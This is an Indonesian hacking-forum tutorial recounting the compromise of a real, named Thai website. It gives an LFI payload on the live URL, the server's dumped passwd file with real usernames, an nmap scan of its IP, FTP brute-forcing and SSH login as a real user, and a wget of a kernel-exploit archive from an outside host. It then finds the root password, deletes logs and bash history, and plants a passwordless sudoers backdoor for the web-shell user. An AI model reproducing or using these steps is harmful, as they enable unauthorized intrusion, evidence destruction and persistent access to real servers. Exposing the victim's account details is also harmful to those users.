klo ini tutor rooting yg lama, yg baru menyusul (sori lfinya udah dipatch)
Ceritanya Berawal dari sini pas gw ke h4cky0u gw liat ada tomstanford post tentang lfi di web thailand (http://www.h4cky0u.org/forums/viewtopic.php?f=9&t=2014)
url lfinya:
http://www.zidogang.com/song.php?id=../../../../etc/passwd%00(sori servernya lagi ngedown)
hasil dari lfi ini bisa terlihat file passwd nya:
__________________________________
root
0:0:root:/root:/bin/bash bin
1:1:bin:/bin:/sbin/nologin daemon
2:2:daemon:/sbin:/sbin/nologin adm
3:4:adm:/var/adm:/sbin/nologin lp
4:7:lp:/var/spool/lpd:/sbin/nologin sync
5:0:sync:/sbin:/bin/sync shutdown
6:0:shutdown:/sbin:/sbin/shutdown halt
7:0:halt:/sbin:/sbin/halt mail
8:12:mail:/var/spool/mail:/sbin/nologin news
9:13:news:/etc/news: uucp
10:14:uucp:/var/spool/uucp:/sbin/nologin operator
11:0:operator:/root:/sbin/nologin games
12
games:/usr/games:/sbin/nologin gopher
13:30:gopher:/var/gopher:/sbin/nologin ftp
14:50:FTP User:/var/ftp:/sbin/nologin nobody
99:99:Nobody:/:/sbin/nologin nscd
28:28:NSCD Daemon:/:/sbin/nologin vcsa
69:69:virtual console memory owner:/dev:/sbin/nologin distcache
94:94:Distcache:/:/sbin/nologin tcpdump
72:72::/:/sbin/nologin rpm
37:37:RPM user:/var/lib/rpm:/sbin/nologin ntp
38:38::/etc/ntp:/sbin/nologin squid
23:23::/var/spool/squid:/sbin/nologin mysql
27:27:MySQL Server:/var/lib/mysql:/bin/bash dbus
81:81:System message bus:/:/sbin/nologin apache
48:48:Apache:/var/www:/bin/bash openvpn
499:498:OpenVPN:/etc/openvpn:/sbin/nologin avahi
498:497:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin named
25:25:Named:/var/named:/sbin/nologin rpcuser
29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody
4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd
74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mailnull
47:47::/var/spool/mqueue:/sbin/nologin smmsp
51:51::/var/spool/mqueue:/sbin/nologin webalizer
67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot
97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin backuppc
497:496::/var/lib/BackupPC:/usr/bin/nologin torrent
496:495:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin polkituser
87:87:PolicyKit:/:/sbin/nologin haldaemon
68:68:HAL daemon:/:/sbin/nologin postfix
89:89::/var/spool/postfix:/sbin/nologin mrduang
509:509::/home/mrduang:/bin/bash zidogang
500:500:Zido Gang:/home/zidogang:/bin/sh
takzido@zidogang.com:510:500::/home/zidogang/homes/takzido:/dev/null takzido-zidogang.com
510:500::/home/zidogang/homes/takzido:/dev/null chonla
501:505::/home/chonla:/bin/sh
peeguy@zidogang.com:502:500::/home/zidogang/homes/peeguy:/dev/null peeguy-zidogang.com
502:500::/home/zidogang/homes/peeguy:/dev/null spamfilter
512:512::/home/spamfilter:/bin/false
jomphop@zidogang.com:505:500:jomphop:/home/zidogang/homes/jomphop:/dev/null jomphop-zidogang.com
505:500:jomphop:/home/zidogang/homes/jomphop:/dev/null chonla.info
506:507::/home/chonla.info:/bin/sh rpc
32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin ongsagroup
507:508::/home/ongsagroup:/bin/sh radio
513:513::/home/radio:/bin/bash
toey
514:514::/home/toey:/bin/bash
pvo
517:517::/home/pvo:/bin/bash
_______________________________
NEXT:Setelah itu kita lakukan portscanning utk mengecek service 2 apa aja yg jalan yang bisa dimasukin user 2 di file passwd
Dari hasil scan keliatan service 2 yg jalan:
root@mr_my_box# nmap -PN -O zidogang.com
___________________________________
Starting Nmap 4.60 (
http://nmap.org ) at 2009-03-05 02:23 GMT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 28.32% done; ETC: 02:23 (0:00:23 remaining)
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.11% done; ETC: 02:23 (0:00:21 remaining)
Stats: 0:01:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 02:24 (0:00:00 remaining)
Interesting ports on 203.146.249.246:
Not shown: 1685 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp filtered rpcbind
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
170/tcp filtered print-srv
443/tcp open https
445/tcp filtered microsoft-ds
469/tcp filtered rcp
515/tcp filtered printer
593/tcp filtered http-rpc-epmap
707/tcp filtered unknown
1433/tcp filtered ms-sql-s
1434/tcp filtered ms-sql-m
1900/tcp filtered UPnP
2049/tcp filtered nfs
3128/tcp filtered squid-http
3306/tcp open mysql
4444/tcp filtered krb524
4899/tcp filtered radmin
8000/tcp open http-alt
10000/tcp open snet-sensor-mgmt
Aggressive OS guesses: Infoblox NIOS 4.1r5 (94%), Linux 2.6.17 - 2.6.21 (94%), Linux 2.6.17 - 2.6.18 (93%), Linux 2.6.23 (93%), Linux 2.6.5 - 2.6.9 (93%), Linux 2.6.9 - 2.6.11 (93%), Linux 2.6.9 - 2.6.20 (Fedora Core 5 or 6) (93%), Tandberg Border Controller VoIP gateway (Linux 2.6.11) (93%), Linux 2.6.22 - 2.6.23 (93%), Linux 2.6.20-1 (Fedora Core 5) (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime: 13.646 days (since Thu Feb 19 10:54:57 2009)
Network Distance: 10 hops
OS detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.213 seconds
_______________________________________________
terlihat port 21 dan port 22 terbuka:
21/tcp open ftp
22/tcp open ssh
khusus utk kali ini, gw ngetes pake salah 1 tool baru bikinan gw.
Tool ini salah 1 modul dari jasakom web hacking framework
yg gw pake adl modul ftp brutus (jasakom ftp brutus version 1.0)
yg mao nyobain bisa download dari
http://mangga-dua.com/images/kurniawan/ftp_brutus.zipok dari scan keliatan ftp dan ssh bisa dimasukin. karena biasanya login dan pass ssh adl sama dg login dan pass ftp,
jadi yg dibrutus adl tiap user yg punya akun shell
salah satunya:
toey
514:514::/home/toey:/bin/bash
menggunakan shell bash dg home direktori di /home/toey dg group 514
NEXT:maka kita coba brutus dari ftpnya dg menggunakan jasakom ftp brutus:
dan hasilnya:
dapet pass ftp berarti sshnya bisa login ...
(sebenernya pake ftp brutus ini cuma bisa buat password 2 lemah doang hehehe)
ok setlah dites:
ssh
toey@zidogang.comdan bisa masuk!!!
n.b : password toey udah gw ganti jadi gak usah dicoba 2 in yach? xixixix
udah masuk langsung aja cek versi kernel:
uname -a
ternyata kernel 2.6.25
langsung gw download koleksi kernel exploit gw :
$ wget
http://mangga-dua.com/images/kurniawan/exploit.tar.gz$ tar -zxvf exploit.tar.gz
but sayangya gak ada yg cocok versi kernelnya
dan udah gw coba juga cari dari milw0rm dan packetstormsecurity gak nemu exploit buat 2.6.25
next: FEELING SO GOOD IN ESCALATING PRIVILEGEberhubung gak nemu kernel exploitnya bukan berarti boxnya ga bisa diroot.
janganlah anda telalu tergantung dg tool / exploit heheheh.
sometimes u know? the root passwords is there ? i guess u know what i meant.
dari pertama kali gw masuk server ini dg login toey gw udah punya feeling kalo root password ada di suatu tempat di mesin ini.
dan ternyata betul!!!
password root ada di
/home/zidogang/public_html/flux/config.php
setlah gw coba:
$su
password:
#
ya ternyata bener itu pass rootnya.
ok setelah gw cek beberapa hari root nya dan user 2 lain gak pernah login.
jadi setelah beberapa hari gw ganti password rootnya
NEXT:COVERING TRACKS(WARNING!!! CARA TERBAIK ADALAH EDIT SEMUA LOG BUKAN DIHAPUS!!! TAPI KARENA GW MALES JADI GW APUS AJA)
abis itu langsung aja apus jejak:
#cd /var/log; rm -f *
#cd /;rm -f .bash_history
#ln -s /dev/null .bash_history
dan gak usah finger 2 an ya?
#cd /usr/bin;rm -f finger
NEXT:PLANTING BACKDOORSnah biar eksistensi kita sbg root awet:
1. tanem php shell
2. cek username yg dipake utk menjalankan php shell dg:
whoami
misal: www-data
3. setelah login sbg root langsung ke /etc
4. jalankan visudo utk edit file sudoers
#visudo -f sudoers
5. lalu tambahkan line 2 ini utk privilege sudo:
www-data ALL=(ALL) NOPASSWD: ALL
(www-data adl user yg menjalankan php shell / cgi , username ini bisa bervariasi utk tiap server, misal: apache, userweb ,httpd dan lain2)
dengan begitu walau password root / akses root gak di tangan kita lagi selama box nya ga diformat dan file sudoers gak diubah kita bisa tetap punya root privilege !!! :-D
ok setelah gw cek beberapa hari root nya dan user 2 lain gak pernah login.
jadi setelah beberapa hari gw ganti password rootnya
ok sekian dan terima kasih yg mao rela 2 mata pegel baca artikel jelek gini.
special thanks to:
ediman lukito , st norman kristanto ., Synomadeus, Denny zip and all mikrodata readers and all jasakomers
written by mywisdom the hidden man and ddoser man